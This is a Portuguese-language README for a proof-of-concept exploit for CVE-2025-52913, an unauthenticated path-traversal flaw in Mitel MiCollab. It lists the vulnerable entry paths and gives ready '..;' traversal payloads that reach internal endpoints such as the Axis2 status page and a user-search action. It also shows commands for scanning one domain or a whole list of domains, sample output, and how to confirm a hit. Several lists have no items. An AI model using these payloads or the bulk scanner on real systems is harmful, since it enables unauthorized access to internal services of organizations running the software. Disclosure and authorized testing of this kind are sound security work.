
Uma Prova de Conceito (PoC) para CVE-2025-52913, uma vulnerabilidade de normalização de caminho que afeta o Mitel MiCollab.
Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-52913, uma vulnerabilidade de normalização de caminho que afeta o Mitel MiCollab.
O problema permite que atacantes não autenticados contornem as restrições de caminho pretendidas ao utilizar sequências de URL manipuladas, como ..;, levando ao acesso a endpoints internos da aplicação.
A exploração bem-sucedida pode permitir:
A vulnerabilidade pode ser acionada através dos seguintes caminhos:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
Exemplos de payloads de travessia:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
Um alvo é provavelmente vulnerável se:
O servidor responder com HTTP 200
A resposta conter:
Axis2Axis2 Happiness PageA vulnerabilidade surge da normalização inadequada de caminhos manipulados contendo ..;, permitindo travessia além do contexto pretendido da aplicação.
Esse comportamento pode expor serviços internos como:
Descoberto por Dahmani Toumi
Este projeto destina-se apenas a fins educacionais e testes de segurança autorizados.
Não utilize esta ferramenta contra sistemas sem permissão explícita. O autor não é responsável por qualquer uso indevido ou danos.